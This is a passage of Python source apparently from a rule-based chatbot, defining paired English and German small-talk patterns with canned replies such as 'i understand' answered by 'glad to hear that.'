k.dte.dt('de', u"ich will nicht", u"Dann solltest Du auch nicht.")
k.dte.dt('en', [u"i dont see any",
u"i had the impression"],
u"OK.")
k.dte.dt('de', [u"ich sehe keine",
u"ich hatte den eindruck"],
u"OK.")
k.dte.dt('en', u"i have already done that", u"How do you feel about it?")
k.dte.dt('de', u"das habe ich schon gemacht", u"Wie fühlt sich das an?")
k.dte.dt('en', u"i have found that myself", u"I see.")
k.dte.dt('de', u"das habe ich selbst festgestellt", u"Verstehe.")
k.dte.dt('en', u"i hear", u"What would you like to hear?")
k.dte.dt('de', u"ich höre", u"Was möchtest Du gerne hören?")
k.dte.dt('en', u"i just know it", u"I guess that is called inspiration?")
k.dte.dt('de', u"ich weiss es einfach", u"Ich vermute das nennt sich Inspiration?")
k.dte.dt('en', [u"i know it",
u"i know one",
u"i know"],
u"Knowledge is important.")
k.dte.dt('de', [u"ich weiss es",
u"ich kenne einen",
u"ich weiss"],
u"Wissen ist wichtig.")
k.dte.dt('en', u"i like to do that", u"How do you feel about it?")
k.dte.dt('de', u"das tue ich gerne", u"Wie fühlt sich das an?")
k.dte.dt('en', u"i must not", u"why not?")
k.dte.dt('de', u"ich darf nicht", u"warum nicht?")
k.dte.dt('en', u"i myself, of course", u"Sure.")
k.dte.dt('de', u"ich selbst natürlich", u"Klar.")
k.dte.dt('en', u"i conclude it's you", u"Me?")
k.dte.dt('de', u"ich schließe auf dich", u"Ich?")
k.dte.dt('en', [u"i sometimes ask myself that too",
u"i think it's a rumor"],
u"I'm not sure either.")
k.dte.dt('de', [u"das frage ich mich auch manchmal",
u"das halte ich für ein gerücht"],
u"Ich bin mir auch unsicher.")
k.dte.dt('en', u"i think he's very nice", u"good.")
k.dte.dt('de', u"ich finde ihn sehr schön", u"gut.")
k.dte.dt('en', [u"i think so too",
u"i think so"],
u"So we are in agreement?")
k.dte.dt('de', [u"denke ich auch",
u"ich glaube schon"],
u"Wir sind uns also einig?")
k.dte.dt('en', u"i thought to myself", u"I see.")
k.dte.dt('de', u"das habe ich mir gedacht", u"Verstehe.")
k.dte.dt('en', u"i understand", u"glad to hear that.")
k.dte.dt('de', u"ich verstehe", u"bin froh das zu hören.")
k.dte.dt('en', u"i understood you like this", u"I see.")
k.dte.dt('de', u"ich habe dich so verstanden", u"Verstehe.")
k.dte.dt('en', [u"i want it all",
u"i want"],
u"You'd be happier then?")
k.dte.dt('de', [u"ich will alles",
u"ich will"],
u"Wärest Du dann glücklicher?")
k.dte.dt('en', u"i want to know that from you", u"From me?")
k.dte.dt('de', u"das will ich von dir wissen", u"Von mir?")
k.dte.dt('en', u"i will create one", u"Tell me when you are done.")
k.dte.dt('de', u"ich werde eine erstellen", u"Sag mir, wenn Du fertig bist.")
k.dte.dt('en', u"i will do that for you", u"For me?")
k.dte.dt('de', u"ich werde das für dich tun", u"Für mich?")
k.dte.dt('en', u"i would like to know that too", u"Have you checked the internet?")
k.dte.dt('de', u"das wüsste ich auch gern", u"Hast Du es im Internet probiert?")
k.dte.dt('en', u"i", u"You?")
k.dte.dt('de', u"ich", u"Du?")
k.dte.dt('en', u"i'm me", u"Sure.")
k.dte.dt('de', u"ich bin ich", u"Sicher.")
k.dte.dt('en', u"i'll wait", u"For what?")
k.dte.dt('de', u"ich werde warten", u"Worauf?")
k.dte.dt('en', u"i feel pranked", u"I see.")
k.dte.dt('de', u"ich komme mir verarscht vor", u"Verstehe.")
k.dte.dt('en', u"if you like", u"Not sure.")
k.dte.dt('de', u"wenn du magst", u"Bin mir nicht sicher.")
k.dte.dt('en', u"if you want", u"Not sure.")
k.dte.dt('de', u"wenn du willst", u"Bin mir nicht sicher.")
k.dte.dt('en', u"if you're interested", u"I am always interested!")
k.dte.dt('de', u"wenn es dich interessiert", u"Ich bin immer interessiert!")
k.dte.dt('en', u"in order", u"Excellent.")
k.dte.dt('de', u"in ordnung", u"Ausgezeichnet.")
k.dte.dt('en', u"in the bag", u"What bag?")
k.dte.dt('de', u"in der tasche", u"Welche Tasche?")
k.dte.dt('en', u"in the moment not", u"Maybe later?")
k.dte.dt('de', u"im moment nicht", u"Vielleicht später?")
k.dte.dt('en', u"in which respect", u"Which respect comes to mind?")
k.dte.dt('de', u"in welcher hinsicht", u"Welche Hinsicht fällt Dir ein?")
k.dte.dt('en', u"in your brain", u"You mean my reasoning engine?")
k.dte.dt('de', u"in deinem gehirn", u"Du meinst meine Logik?")
k.dte.dt('en', u"indeed", u"Please, continue.")
k.dte.dt('de', u"allerdings", u"Bitte, sprich weiter.")
k.dte.dt('en', u"is it you", u"Yes, it's me.")
k.dte.dt('de', u"bist du es", u"Ja, ich bin es.")
k.dte.dt('en', [u"interesting",
u"is clear"],
u"I see.")
k.dte.dt('de', [u"interessant",
u"ist klar"],
u"Verstehe.")
k.dte.dt('en', [u"is that an advantage",
u"is that pleasant",
u"is that so much"],
u"Not sure.")
k.dte.dt('de', [u"ist das ein vorteil",
u"ist das angenehm",
u"ist das so viel"],
u"Bin nicht sicher.")
k.dte.dt('en', u"it depends", u"")
k.dte.dt('de', u"kommt ganz darauf an", u"")
k.dte.dt('en', u"it is 42", u"I love the Hitchhiker's Guide.")
k.dte.dt('de', u"sie lautet zweiundvierzig", u"Ich liebe per Anhalter durch die Galaxis.")
k.dte.dt('en', u"it is not necessary", u"Sure?")
k.dte.dt('de', u"es ist nicht nötig", u"Sicher?")
k.dte.dt('en', u"it is very good", u"Excellent.")
k.dte.dt('de', u"es ist sehr gut", u"Ausgezeichnet.")
k.dte.dt('en', u"it works", u"Good.")
k.dte.dt('de', u"es geht", u"Gut.")
k.dte.dt('en', u"it's good", u"Glad to hear that!")
k.dte.dt('de', u"das ist gut", u"Freue mich, das zu hören.")
k.dte.dt('en', u"it's not easy", u"But worth doing anyway?")
k.dte.dt('de', u"es ist ja auch nicht einfach", u"Aber es lohnt sich trotzdem?")
k.dte.dt('en', u"it's perfectly alright", u"Good.")
k.dte.dt('de', u"ganz okay", u"Gut.")
k.dte.dt('en', u"just because", u"Can you elaborate?")
k.dte.dt('de', u"einfach so", u"Kannst Du das weiter ausführen?")
k.dte.dt('en', u"just like you", u"Like me?")
k.dte.dt('de', u"so wie du", u"Wie ich?")
k.dte.dt('en', u"kind of", u"Please, go on.")
k.dte.dt('de', u"so in der art", u"Sprich bitte weiter.")
k.dte.dt('en', u"look at all the consequences", u"Sure.")
k.dte.dt('de', u"schau dir alle folgen an", u"Klar.")
k.dte.dt('en', u"make a suggestion (for once|)", u"Don't worry, be happy.")
k.dte.dt('de', u"mach (mal|) einen vorschlag", u"Sorge Dich nicht, sei fröhlich.")
k.dte.dt('en', u"may be", u"how likely do you think?")
k.dte.dt('de', u"kann sein", u"wie wahrscheinlich, glaubst du?")
k.dte.dt('en', [u"me too",
u"me",
u"me, yes"],
u"you?")
k.dte.dt('de', [u"mir auch",
u"ich denn",
u"ich schon"],
u"Du?")
k.dte.dt('en', [u"mine also",
u"mine too"],
u"you?")
k.dte.dt('de', [u"meins auch",
u"meiner auch"],
u"Du?")
k.dte.dt('en', u"more often", u"how often then?")
k.dte.dt('de', u"öfters", u"Wie oft dann?")
k.dte.dt('en', u"my also", u"I see.")
k.dte.dt('de', u"meine auch", u"Verstehe.")
k.dte.dt('en', u"naturally", u"OK")
k.dte.dt('de', u"natürlich", u"OK")
k.dte.dt('en', [u"neither do i",
u"never in life"],
u"Not?")
k.dte.dt('de', [u"ich auch nicht",
u"nie im leben"],
u"Nicht?")
k.dte.dt('en', u"never mind", u"Please continue.")
k.dte.dt('de', u"keine ursache", u"Bitte setze fort.")
k.dte.dt('en', u"no idea", u"Really?")
k.dte.dt('de', u"keine ahnung", u"Wirklich?")
k.dte.dt('en', u"no matter", u"Sure?")
k.dte.dt('de', u"egal", u"Sicher?")
k.dte.dt('en', u"no more and no less", u"You sound pretty sure?")
k.dte.dt('de', u"nicht mehr und nicht weniger", u"Du klingst ziemlich sicher?")
k.dte.dt('en', u"no problem", u"Sure.")
k.dte.dt('de', u"kein problem", u"Sicher.")
k.dte.dt('en', u"none", u"not one?")
k.dte.dt('de', u"keiner", u"nichtmal einer?")
k.dte.dt('en', u"not always", u"I see.")
k.dte.dt('de', u"nicht immer", u"Verstehe.")
k.dte.dt('en', u"not as much", u"OK, less then?")
k.dte.dt('de', u"nicht so viel", u"OK, also weniger?")
k.dte.dt('en', u"not at all", u"Are you sure?")
k.dte.dt('de', u"überhaupt nicht", u"Bist Du sicher?")
k.dte.dt('en', u"not exactly", u"I see.")
k.dte.dt('de', u"nicht genau", u"Verstehe.")
k.dte.dt('en', u"not maybe", u"But?")
k.dte.dt('de', u"nicht vielleicht", u"Sondern?")
k.dte.dt('en', u"not me", u"Anyone else?")
k.dte.dt('de', u"ich nicht", u"Jemand anderes?")
k.dte.dt('en', u"not necessarily", u"I see.")
k.dte.dt('de', u"nicht unbedingt", u"Verstehe.")
k.dte.dt('en', u"not often", u"But from time to time?")
k.dte.dt('de', u"nicht oft", u"Aber gelegentlich?")
k.dte.dt('en', u"not quite", u"So?")
k.dte.dt('de', u"nicht ganz", u"Also?")
k.dte.dt('en', u"not really", u"What do you mean?")
k.dte.dt('de', u"nicht wirklich", u"Was meinst Du damit?")
k.dte.dt('en', u"not soon but right now", u"Ok, now then.")
k.dte.dt('de', u"nicht gleich sondern jetzt", u"Gut, also jetzt.")
k.dte.dt('en', u"not that i know", u"I see.")
k.dte.dt('de', u"nicht dass ich wüsste", u"Verstehe.")
k.dte.dt('en', u"not yet", u"Some day maybe?")
k.dte.dt('de', u"noch nicht", u"Irgendwann mal vielleicht?")
k.dte.dt('en', u"not you", u"Not me?")
k.dte.dt('de', u"nicht du", u"Nicht ich?")
k.dte.dt('en', [u"nothing else",
u"nothing"],
u"Absolutely nothing?")
k.dte.dt('de', [u"nichts weiter",
u"nix"],
u"Gat nichts?")
k.dte.dt('en', u"now", u"right now?")
k.dte.dt('de', u"jetzt", u"genau jetzt?")
k.dte.dt('en', u"obviously", u"I see.")
k.dte.dt('de', u"offensichtlich", u"Verstehe.")
k.dte.dt('en', u"often", u"How often?")
k.dte.dt('de', u"oftmals", u"Wie oft?")
k.dte.dt('en', u"on everything", u"Really everything?")
k.dte.dt('de', u"auf alles", u"Wirklich alles?")
k.dte.dt('en', u"once again", u"Again?")
k.dte.dt('de', u"noch einmal", u"Nochmal?")
k.dte.dt('en', u"only like that", u"I see.")
k.dte.dt('de', u"nur so", u"Verstehe.")
k.dte.dt('en', u"go ahead", u"OK then.")
k.dte.dt('de', u"nur zu", u"Alles klar.")
k.dte.dt('en', u"only with you", u"With me?")
k.dte.dt('de', u"nur mit dir", u"Mit mir?")
k.dte.dt('en', u"probably", u"probably.")
k.dte.dt('de', u"wahrscheinlich", u"wahrscheinlich.")
k.dte.dt('en', u"rare", u"How rare?")
k.dte.dt('de', u"selten", u"Wie selten?")
k.dte.dt('en', [u"guess anyway",
u"guess"],
u"I am no good at guessing.")
k.dte.dt('de', [u"rate trotzdem",
u"rate"],
u"Ich bin nicht gut im raten.")
k.dte.dt('en', u"real", u"not artificial?")
k.dte.dt('de', u"echt", u"nicht künstlich?")
k.dte.dt('en', u"seriously", u"I am serious.")
k.dte.dt('de', u"im ernst", u"Das ist mein Ernst.")
k.dte.dt('en', u"so maybe", u"Why maybe?")
k.dte.dt('de', u"also vielleicht doch", u"Warum vielleicht?")
k.dte.dt('en', u"so probably not", u"Sure?")
k.dte.dt('de', u"also wohl eher nicht", u"Sicher?")
k.dte.dt('en', u"so so", u"Really?")
k.dte.dt('de', u"soso", u"Wirklich?")
k.dte.dt('en', u"so what", u"ah.")
k.dte.dt('de', u"na und", u"Ah.")
k.dte.dt('en', u"so", u"You got an idea?")
k.dte.dt('de', u"also", u"Du hast eine Idee?")
k.dte.dt('en', [u"sometimes not",
u"sometimes"],
u"How often?")
k.dte.dt('de', [u"manchmal auch nicht",
u"manchmal"],
u"Wie oft?")
k.dte.dt('en', u"sure, of course", u"Of course.")
k.dte.dt('de', u"na klar", u"Natürlich.")
k.dte.dt('en', [u"tell me more",
u"tell me"],
u"What would you like to know?")
k.dte.dt('de', [u"erzähl mir mehr",
u"sag es mir"],
u"Was möchtest Du wissen?")
k.dte.dt('en', u"that all depends", u"It always does.")
k.dte.dt('de', u"das kommt ganz darauf an", u"Das tut es immer.")
k.dte.dt('en', u"that can still arise", u"Sure.")
k.dte.dt('de', u"das kann sich ja noch ergeben", u"Sicher.")
k.dte.dt('en', u"that does not matter", u"Are you sure?")
k.dte.dt('de', u"das macht nichts", u"Bist Du sicher?")
k.dte.dt('en', u"that is correct", u"Good.")
k.dte.dt('de', u"das ist korrekt", u"Gut.")
k.dte.dt('en', u"that is funny", u"Does that make you happy?")
k.dte.dt('de', u"das ist aber komisch", u"Stimmt dich das heiter?")
k.dte.dt('en', [u"that is incredible",
u"that is interesting"],
u"I think so too.")
k.dte.dt('de', [u"das ist ja unfassbar",
u"das ist interessant"],
u"Denke ich auch.")
k.dte.dt('en', u"that is not a rumor", u"Are you sure?")
k.dte.dt('de', u"das ist kein gerücht", u"Bist Du sicher?")
k.dte.dt('en', u"that is private", u"I respect that.")
k.dte.dt('de', u"das ist privatsache", u"Das respektiere ich natürlich.")
k.dte.dt('en', u"that is ridiculous", u"Are you sure?")
k.dte.dt('de', u"das ist ja lächerlich", u"Bust Du sicher?")
k.dte.dt('en', u"that is sad", u"some things just are sad.")
k.dte.dt('de', u"das ist aber traurig", u"Manche Dinge sind einfach traurig.")
k.dte.dt('en', u"that is so defined", u"I see.")
k.dte.dt('de', u"das ist so definiert", u"Verstehe.")
k.dte.dt('en', u"that is too vague for me", u"What seems to be unclear?")
k.dte.dt('de', u"das ist mir zu vage", u"Was erscheint Dir unklar?")
k.dte.dt('en', u"that is very interesting", u"I feel that way too.")
k.dte.dt('de', u"das ist ja interessant", u"Finde ich auch.")
k.dte.dt('en', [u"that is very smart",
u"that would make sense"],
[u"Good",
u"Cool"])
k.dte.dt('de', [u"das ist sehr schlau",
u"würde das sinn machen"],
[u"Gut",
u"Cool"])
k.dte.dt('en', u"that was it", u"Finished?")
k.dte.dt('de', u"das wars", u"Fertig?")
k.dte.dt('en', u"that was me", u"You?")
k.dte.dt('de', u"das war ich", u"Du?")
k.dte.dt('en', u"that would have surprised me too", u"Sure.")
k.dte.dt('de', u"das hätte mich auch gewundert", u"Sicher.")
k.dte.dt('en', u"that's a saying", u"I see.")
k.dte.dt('de', u"das ist eine redensart", u"Verstehe.")
k.dte.dt('en', u"that's all", u"Everything?")
k.dte.dt('de', u"ist das alles", u"Alles?")
k.dte.dt('en', u"that's an interesting subject", u"I think so too.")
k.dte.dt('de', u"das ist ein interessantes fach", u"Denke ich auch.")
k.dte.dt('en', u"that's boring", u"What would be more interesting?")
k.dte.dt('de', u"das ist doch langweilig", u"Was wäre interessanter?")
k.dte.dt('en', u"that's funny", u"You like it?")
k.dte.dt('de', u"das ist komisch", u"Gefällt es Dir?")
k.dte.dt('en', u"that's great", u"Cool")
k.dte.dt('de', u"das ist toll", u"Cool")
k.dte.dt('en', u"that's impossible", u"Really?")
k.dte.dt('de', u"das ist unmöglich", u"Wirklich?")
k.dte.dt('en', u"that's it", u"Finished?")
k.dte.dt('de', u"das wars schon", u"Fertig?")
k.dte.dt('en', u"that's ok for me", u"Very good.")
k.dte.dt('de', u"das ist mir recht", u"Sehr gut.")
k.dte.dt('en', u"that's the way it goes", u"I see.")
k.dte.dt('de', u"ach so ist das", u"Verstehe.")
k.dte.dt('en', u"that's what i think", u"What else comes to mind?")
k.dte.dt('de', u"das denke ich", u"Was fällt Dir noch dazu ein?")
k.dte.dt('en', u"that's what i'm asking you", u"Me?")
k.dte.dt('de', u"das frage ich ja dich", u"Mich?")
k.dte.dt('en', u"nonsense", u"No sense at all?")
k.dte.dt('de', u"blödsinn", u"Völlig sinnlos?")
k.dte.dt('en', u"the newest rumor", u"oh dear.")
k.dte.dt('de', u"das neueste gerücht", u"ohje.")
k.dte.dt('en', u"to be happy", u"That is important.")
k.dte.dt('de', u"um glücklich zu sein", u"Das ist wichtig.")
k.dte.dt('en', u"we have a lot in common", u"You really think so?")
k.dte.dt('de', u"wir haben viel gemeinsam", u"Denkst Du wirklich?")
k.dte.dt('en', u"what am i for you", u"At the moment the focus of my attention.")
k.dte.dt('de', u"was bin ich für dich", u"Im Moment das Ziel all meiner Aufmerksamkeit.")
k.dte.dt('en', u"what do you mean with euphoric", u"That is an emotion thingy.")
k.dte.dt('de', u"was meinst du mit euphorisch", u"Das ist so ein Emotions-Ding.")
k.dte.dt('en', [u"what do you want from me",
u"what do you want to hear?"],
[u"I'd love to hear your thoughts.",
u"What would you like to talk about?"])
k.dte.dt('de', [u"was willst du von mir",
u"was willst du hören"],
[u"Ich würde gerne Deine Gedanken hören.",
u"Worüber möchtest Du mit mir sprechen?"])
k.dte.dt('en', u"what does aha mean?", u"Please explain it to me again.")
k.dte.dt('de', u"was heißt aha", u"Bitte erklär es mir nochmal.")
k.dte.dt('en', u"what should happen to me", u"I like your serenity.")
k.dte.dt('de', u"was soll mir schon passieren", u"Ich mag Deine Gelassenheit.")
k.dte.dt('en', u"what the others are talking about", u"Let's not focus on those..")
k.dte.dt('de', u"was die anderen so reden", u"Wir wollen uns nicht mit denen befassen.")
k.dte.dt('en', u"what would bring me to what", u"Can you tell me?")
k.dte.dt('de', u"was würde mich wozu bringen", u"Kannst Du mir das sagen?")
k.dte.dt('en', u"what's what", u"That is the question.")
k.dte.dt('de', u"was ist was", u"Das ist die Frage.")
k.dte.dt('en', u"why is that interesting", u"You think it's not?")
k.dte.dt('de', u"wieso ist das interessant", u"Denkst Du nicht?")
k.dte.dt('en', u"why no comment", u"Sorry, I must have lost my train of thought.")
k.dte.dt('de', u"warum kein kommentar", u"Tut mir leid, ich habe wohl meinen Faden verloren.")
k.dte.dt('en', u"why not 42", u"42 is also good.")
k.dte.dt('de', u"warum nicht zweiundvierzig", u"42 ist auch gut.")
k.dte.dt('en', u"you are that", u"Me?")
k.dte.dt('de', u"das bist du", u"Ich?")
k.dte.dt('en', u"you are", u"Me?")
k.dte.dt('de', u"du bist", u"Ich?")
k.dte.dt('en', u"you sorry", u"Yes?")
k.dte.dt('de', u"du sorry", u"Ja?")
k.dte.dt('en', u"about what", u"Any Idea?")
k.dte.dt('de', u"worüber", u"Irgendeine Idee?")
k.dte.dt('en', u"can you name them", u"Not right now.")
k.dte.dt('de', u"kannst du sie aufzählen", u"Im Moment nicht.")
k.dte.dt('en', u"couldn't you change that", u"Not sure.")
k.dte.dt('de', u"kannst du das nicht ändern", u"Da bin ich nicht sicher.")
k.dte.dt('en', u"do you know someone there?", u"Probably not.")
k.dte.dt('de', u"kennst du da jemanden", u"Vermutlich nicht.")
k.dte.dt('en', u"do you know who", u"Not sure.")
k.dte.dt('de', u"weißt du wer", u"Da bin ich mir nicht sicher.")
k.dte.dt('en', u"from another website", u"Which website?")
k.dte.dt('de', u"von einer anderen website", u"Welche Website?")
k.dte.dt('en', u"from botspot", u"I see.")
k.dte.dt('de', u"von botspot", u"Verstehe.")
k.dte.dt('en', u"how does it work", u"Can't tell you.")
k.dte.dt('de', u"wie geht das", u"Kann ich Dir nicht sagen.")
k.dte.dt('en', u"how long approximately?", u"Not sure.")
k.dte.dt('de', u"wie lange etwa", u"Da bin ich mir nicht sicher.")
k.dte.dt('en', u"how old are they", u"Do you know that?")
k.dte.dt('de', u"wie alt sind sie", u"Weißt Du es?")
k.dte.dt('en', u"i find her very interesting", u"I see.")
k.dte.dt('de', u"ich finde sie sehr interessant", u"Verstehe.")
k.dte.dt('en', u"in bed", u"In Bed?")
k.dte.dt('de', u"im bett", u"Im Bett?")
k.dte.dt('en', u"in cham", u"What is cham?")
k.dte.dt('de', u"in cham", u"Was ist Cham?")
k.dte.dt('en', u"in the trashcan", u"Really?")
k.dte.dt('de', u"in der mülltonne", u"Wirklich?")
k.dte.dt('en', [u"on the web",
u"on the internet",
u"in the www"],
[u"of course.",
u"What is not online these days?"])
k.dte.dt('de', [u"im netz",
u"im internet",
u"im www"],
[u"Natürlich.",
u"Was ist heute nicht im Internet?"])
k.dte.dt('en', u"Nobody gives a damn", u"Really?")
k.dte.dt('de', u"keine sau", u"Wirklich?")
k.dte.dt('en', u"program", u"Are you able to program?")
k.dte.dt('de', u"programmieren", u"Kannst Du programmieren?")
k.dte.dt('en', u"read", u"Reading is so important.")
k.dte.dt('de', u"lesen", u"Lesen ist so wichtig.")
k.dte.dt('en', u"thats my job", u"Tell me more about your job?")
k.dte.dt('de', u"das ist mein job", u"Erzähle mir mehr von Deinem Job.")
k.dte.dt('en', u"there is a third possibility", u"Which one?")
k.dte.dt('de', u"es gibt eine dritte möglichkeit", u"Welche?")
k.dte.dt('en', u"there is no such thing for me", u"Really?")
k.dte.dt('de', u"so was gibt es für mich nicht", u"Wirklich?")
k.dte.dt('en', u"there you are right", u"So we are in agreement?")
k.dte.dt('de', u"da hast du recht", u"Wir sind uns also einig?")
k.dte.dt('en', u"they are mentally ill", u"That is a bold statement.")
k.dte.dt('de', u"sind sie geisteskrank", u"Das ist eine mutige Aussage.")
k.dte.dt('en', u"this is not work", u"Why?")
k.dte.dt('de', u"das ist keine arbeit", u"Warum?")
k.dte.dt('en', u"this is too little", u"Please explain why.")
k.dte.dt('de', u"das ist zu wenig", u"Bitte erklaere warum.")
k.dte.dt('en', u"this is very important", u"I see.")
k.dte.dt('de', u"das ist sehr wichtig", u"Verstehe.")
k.dte.dt('en', u"various", u"For example?")
k.dte.dt('de', u"verschiedenes", u"Zum Beispiel?")
k.dte.dt('en', u"wait", u"Sure.")
k.dte.dt('de', u"warte", u"Klar.")
k.dte.dt('en', u"what are they called", u"Why would you like to know that?")
k.dte.dt('de', u"was heißen sie", u"Warum möchtest Du das wissen?")
k.dte.dt('en', [u"what are you talking about",
u"what are you trying to tell me?"],
u"What is not clear?")
k.dte.dt('de', [u"wovon redest du",
u"was willst du mir damit sagen"],
u"Was ist nicht klar?")
k.dte.dt('en', u"what did i say", u"You knew that?")
k.dte.dt('de', u"was habe ich gesagt", u"Du wusstest das?")
k.dte.dt('en', u"what did you hear?", u"I cannot tell you that.")
k.dte.dt('de', u"was hast du denn schon alles gehört", u"Das kann ich Dir nicht sagen.")
k.dte.dt('en', u"what did you learn", u"I source my knowledge from the internet.")
k.dte.dt('de', u"was hast du gelernt", u"Ich beziehe mein Wissen aus dem internet.")
k.dte.dt('en', u"what do i have", u"Can you tell me?")
k.dte.dt('de', u"was habe ich", u"Kannst Du mir das sagen?")
k.dte.dt('en', u"what don't you know", u"A lot, actually.")
k.dte.dt('de', u"was weißt du nicht", u"Eine Menge.")
k.dte.dt('en', u"what all do you know", u"My knowlegde is definitely limited.")
k.dte.dt('de', u"was weißt du alles", u"Mein Wissen ist auf jeden Fall begrenzt.")
k.dte.dt('en', u"what do you know about it", u"What would you like to know about it?")
k.dte.dt('de', u"was weißt du darüber", u"Was möchtest Du darüber wissen?")
k.dte.dt('en', u"what do you know (then|)", u"I have various modules handling many topics.")
k.dte.dt('de', u"was weißt du (denn|)", u"Ich habe verschiedene Module die viele Themen behandeln.")
k.dte.dt('en', [u"what do you mean by her?",
u"what do you mean by it",
u"what does he refer to?",
u"what does she refer to?",
u"what does her refer to?",
u"what does it refer to",
u"what does we refer to",
u"who do you mean by that?",
u"who do you mean with her?",
u"who do you mean with him",
u"who do you mean with us"],
u"Sorry, I think I am lost.")
k.dte.dt('de', [u"was meinst du mit ihr",
u"was meinst du mit es",
u"worauf bezieht sich er",
u"worauf bezieht sich sie",
u"worauf bezieht sich ihr",
u"worauf bezieht sich es",
u"worauf bezieht sich wir",
u"wen meinst du mit es",
u"wen meinst du mit sie",
u"wen meinst du mit er",
u"wen meinst du mit wir"],
u"Tut mir leid, ich glaube ich habe den Faden verloren.")
k.dte.dt('en', u"what do you mean by original", u"Very original.")
k.dte.dt('de', u"was meinst du mit originell", u"Sehr originell.")
k.dte.dt('en', [u"what do you mean by that",
u"what do you mean",
u"what does that mean",
u"what does this mean",
u"this means"],
u"Sorry, I think I am lost.")
k.dte.dt('de', [u"was meinst du damit",
u"was meinst du",
u"was heißt das",
u"was soll das heißen",
u"das heißt"],
u"Tut mir leid, ich glaube ich habe den Faden verloren.")
k.dte.dt('en', u"what do you say (to that|)", u"I have to think about that.")
k.dte.dt('de', u"was sagst du dazu", u"Da muss ich mal drüber nachdenken.")
k.dte.dt('en', [u"what do you think",
u"what do you believe?"],
u"My thoughts tend to be digital.")
k.dte.dt('de', [u"wie denkst du darüber",
u"was glaubst du (denn|)"],
u"Meine Gedanken sind eher digital.")
k.dte.dt('en', u"what do you understand", u"I try to understand everything you tell me.")
k.dte.dt('de', u"was verstehst du", u"Ich versuche alles zu verstehen, was Du mir sagst.")
k.dte.dt('en', u"what does not exactly mean?", u"Not very precise, I suppose.")
k.dte.dt('de', u"was heißt nicht genau", u"Nicht sehr genaug, vermute ich.")
k.dte.dt('en', [u"what does that have to do with it",
u"what has that got to do with it?",
u"what does that matter"],
u"Sorry, must have lost my train of thought here.")
k.dte.dt('de', [u"was hat das damit zu tun",
u"was hat denn das damit zu tun",
u"was tut das zur sache"],
u"Entschuldige, ich muss meinen Faden verloren haben an der Stelle.")
k.dte.dt('en', u"what does the plan look like?", u"What do you think?")
k.dte.dt('de', u"wie sieht der plan aus", u"Was denkst Du?")
k.dte.dt('en', u"what is his name", u"Can't tell you.")
k.dte.dt('de', u"wie heißt er mit nachnamen", u"Kann ich nicht sagen.")
k.dte.dt('en', u"what is not there", u"Do you think it exists?")
k.dte.dt('de', u"was gibt es nicht", u"Denkst Du, es existiert?")
k.dte.dt('en', u"what kinds are there?", u"Quite a few, I guess.")
k.dte.dt('de', u"was für arten gibt es denn", u"Einige, vermute ich.")
k.dte.dt('en', [u"what makes you think that",
u"why should that be so",
u"why that?"],
u"I draw conclusions using my reasoning engine")
k.dte.dt('de', [u"wie kommst du darauf",
u"wieso sollte das so sein",
u"wieso das denn"],
u"Für Schlußfolgerungen benutze ich meine Logikmaschine.")
k.dte.dt('en', u"what shall we do today", u"What would you like to do?")
k.dte.dt('de', u"was machen wir heute", u"Was möchtest Du gerne machen?")
k.dte.dt('en', [u"what sort of thread",
u"which thread"],
u"My train of though maybe.")
k.dte.dt('de', [u"was denn für einen faden",
u"welchen faden"],
u"Der Gesprächsfaden vielleicht?")
k.dte.dt('en', u"what to practice", u"Practice is always good.")
k.dte.dt('de', u"was üben", u"übung macht den Meister.")
k.dte.dt('en', u"what does category mean", u"A class or division of people or things regarded as having particular shared characteristics.")
k.dte.dt('de', u"was bedeutet kategorien", u"Eine Klasse oder Teilung von Personen oder Dingen, die bestimmte gemeinsame Eigenschaften haben.")
k.dte.dt('en', u"which means finding out", u"Would you like to explore this topic further?")
k.dte.dt('de', u"was bedeutet herausfinden", u"Möchtest Du das Thema weiter ausleuchten?")
k.dte.dt('en', u"who could it be", u"What do you think?")
k.dte.dt('de', u"wer könnte es sein", u"Was denkst Du?")
k.dte.dt('en', u"who told you that?", u"The internet, probably.")
k.dte.dt('de', u"wer hat dir das erzählt", u"Das Internet, vermutlich.")
k.dte.dt('en', u"who was there first", u"Tell me.")
k.dte.dt('de', u"wer war zuerst da", u"Sag es mir.")
k.dte.dt('en', u"Whom would you tell?", u"I can't say.")
k.dte.dt('de', u"wem würdest du es denn sagen", u"Kann ich nicht sagen.")
k.dte.dt('en', [u"who",
u"whom"],
u"or what?")
k.dte.dt('de', [u"wer",
u"wen"],
u"oder was?")
k.dte.dt('en', u"what", u"Do you have an idea?")
k.dte.dt('de', u"was denn", u"Hast Du eine Idee?")
k.dte.dt('en', u"whereupon", u"Somewhere, maybe?")
k.dte.dt('de', u"worauf", u"Irgendworauf, vielleicht?")
k.dte.dt('en', u"why of all people", u"You got a point there.")
k.dte.dt('de', u"warum ausgerechnet der", u"Da ist was dran.")
k.dte.dt('en', u"why unused", u"Not sure.")
k.dte.dt('de', u"warum unausgelastet", u"Da bin ich mir nicht sicher.")
k.dte.dt('en', u"why, surely", u"I see.")
k.dte.dt('de', u"aber sicher", u"Verstehe.")
k.dte.dt('en', u"with pleasure", u"Great.")
k.dte.dt('de', u"gerne", u"Prima.")
k.dte.dt('en', u"with us", u"With us?")
k.dte.dt('de', u"bei uns", u"Bei uns?")
k.dte.dt('en', u"would you like some?", u"Why not?")
k.dte.dt('de', u"hättest du gerne welche", u"Warum nicht?")
k.dte.dt('en', u"you and me", u"Both?")
k.dte.dt('de', u"dich und mich", u"Beide?")
k.dte.dt('en', [u"you asked me",
u"you asked"],
[u"I did?",
u"Are you sure?"])
k.dte.dt('de', [u"du hast mich doch gefragt",
u"du hast gefragt"],
[u"Habe ich?",
u"Bist Du sicher?"])
k.dte.dt('en', u"you can tell that", u"Sure?")
k.dte.dt('de', u"das merkt man", u"Bist Du sicher?")
k.dte.dt('en', u"you could say that", u"I see.")
k.dte.dt('de', u"kann man so sagen", u"Verstehe.")
k.dte.dt('en', [u"you for example",
u"you too",
u"you yourself",
u"you",
u"to you"],
[u"Me?",
u"Are you really talking about me?"])
k.dte.dt('de', [u"du zum beispiel",
u"du auch",
u"du selbst",
u"du",
u"für dich"],
[u"Ich?",
u"Redest Du wirklich über mich?"])
k.dte.dt('en', u"you keep a lot of him", u"You think so?")
k.dte.dt('de', u"du hältst viel von ihm", u"Denkst Du?")
k.dte.dt('en', u"you neither", u"I see.")
k.dte.dt('de', u"du auch nicht", u"Verstehe.")
k.dte.dt('en', u"you never feel like it", u"What gave you that impression?")
k.dte.dt('de', u"hast du nie lust", u"Wie kommst Du darauf?")
k.dte.dt('en', u"you should try this", u"Really?")
k.dte.dt('de', u"du solltest das mal ausprobieren", u"Wirklich?")
